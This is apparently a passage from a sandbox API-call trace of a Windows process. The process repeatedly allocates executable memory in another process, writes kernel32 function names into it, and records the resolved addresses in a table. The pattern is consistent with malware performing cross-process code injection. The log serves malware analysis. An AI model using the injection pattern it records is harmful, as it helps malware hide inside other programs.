	[0239.975] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0239.975] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0239.976] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0239.976] ResetEvent (hEvent=0x680) returned 1
	[0239.976] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0239.976] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0239.976] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.977] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0239.977] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.977] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f23c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0239.977] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0239.977] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0239.977] lstrlenA (lpString="GetCurrentThreadId") returned 18
	[0239.977] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0239.977] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcbf8*, nSize=0x13, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcbf8*, lpNumberOfBytesWritten=0x12858c*=0x13) returned 1
	[0239.978] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0239.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0239.978] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0239.978] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0239.979] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0239.979] ResetEvent (hEvent=0x680) returned 1
	[0239.979] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0239.979] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0239.979] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.979] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0239.979] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.979] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f240, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0239.980] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0239.980] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0239.980] lstrlenA (lpString="GetEnvironmentVariableA") returned 23
	[0239.980] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0239.980] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcc0e*, nSize=0x18, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcc0e*, lpNumberOfBytesWritten=0x12858c*=0x18) returned 1
	[0239.981] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0239.981] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0239.981] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0239.981] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0239.981] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0239.982] ResetEvent (hEvent=0x680) returned 1
	[0239.982] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0239.982] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0239.982] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.982] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0239.982] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.982] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f244, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0239.983] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0239.983] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0239.983] lstrlenA (lpString="GetLastError") returned 12
	[0239.983] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0239.983] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcc28*, nSize=0xd, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcc28*, lpNumberOfBytesWritten=0x12858c*=0xd) returned 1
	[0239.984] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0239.984] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0239.984] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0239.984] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0239.984] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0239.985] ResetEvent (hEvent=0x680) returned 1
	[0239.985] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0239.985] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0239.985] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.985] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0239.985] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.985] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f248, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0239.986] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0239.986] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0239.986] lstrlenA (lpString="GetModuleHandleA") returned 16
	[0239.986] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0239.986] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcc38*, nSize=0x11, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcc38*, lpNumberOfBytesWritten=0x12858c*=0x11) returned 1
	[0239.986] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0239.986] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0239.986] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0239.987] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0239.987] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0239.987] ResetEvent (hEvent=0x680) returned 1
	[0239.987] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0239.988] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0239.988] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.988] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0239.988] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0239.988] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f24c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0239.988] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0239.989] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0239.989] lstrlenA (lpString="GetModuleHandleW") returned 16
	[0239.989] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0239.989] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcc4c*, nSize=0x11, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcc4c*, lpNumberOfBytesWritten=0x12858c*=0x11) returned 1
	[0239.989] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0239.989] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0239.989] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0239.990] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0239.990] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0239.990] ResetEvent (hEvent=0x680) returned 1
	[0239.990] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.043] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.043] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.043] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.043] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.043] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f250, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.044] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.044] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.044] lstrlenA (lpString="GetProcAddress") returned 14
	[0240.044] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.044] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcc60*, nSize=0xf, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcc60*, lpNumberOfBytesWritten=0x12858c*=0xf) returned 1
	[0240.045] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.045] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.045] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.045] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.046] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.046] ResetEvent (hEvent=0x680) returned 1
	[0240.046] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.047] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.047] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.047] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.047] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.047] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f254, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.048] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.048] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.048] lstrlenA (lpString="GetProcessHeap") returned 14
	[0240.048] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.048] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcc72*, nSize=0xf, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcc72*, lpNumberOfBytesWritten=0x12858c*=0xf) returned 1
	[0240.048] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.048] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.048] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.049] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.049] ResetEvent (hEvent=0x680) returned 1
	[0240.049] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.049] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.050] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.050] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.050] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.050] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f258, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.050] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.050] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.050] lstrlenA (lpString="GetSystemTimeAsFileTime") returned 23
	[0240.050] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.051] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcc84*, nSize=0x18, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcc84*, lpNumberOfBytesWritten=0x12858c*=0x18) returned 1
	[0240.051] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.051] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.051] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.051] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.052] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.052] ResetEvent (hEvent=0x680) returned 1
	[0240.052] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.052] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.052] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.052] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.052] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.052] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f25c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.053] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.053] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.053] lstrlenA (lpString="GetTickCount") returned 12
	[0240.053] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.053] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bcc9e*, nSize=0xd, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bcc9e*, lpNumberOfBytesWritten=0x12858c*=0xd) returned 1
	[0240.054] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.054] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.054] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.054] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.055] ResetEvent (hEvent=0x680) returned 1
	[0240.055] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.055] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.055] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.055] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.055] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.055] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6cd4f260, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0240.056] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.056] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.056] lstrlenA (lpString="HeapAlloc") returned 9
	[0240.056] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.056] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x20000, lpBuffer=0x28bccae*, nSize=0xa, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x28bccae*, lpNumberOfBytesWritten=0x12858c*=0xa) returned 1
	[0240.057] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0240.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1630
	[0240.057] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x120000
	[0240.057] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x120000, lpBuffer=0x27e1630*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x27e1630*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0240.057] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0240.058] ResetEvent (hEvent=0x680) returned 1
	[0240.058] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.058] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.058] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.058] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
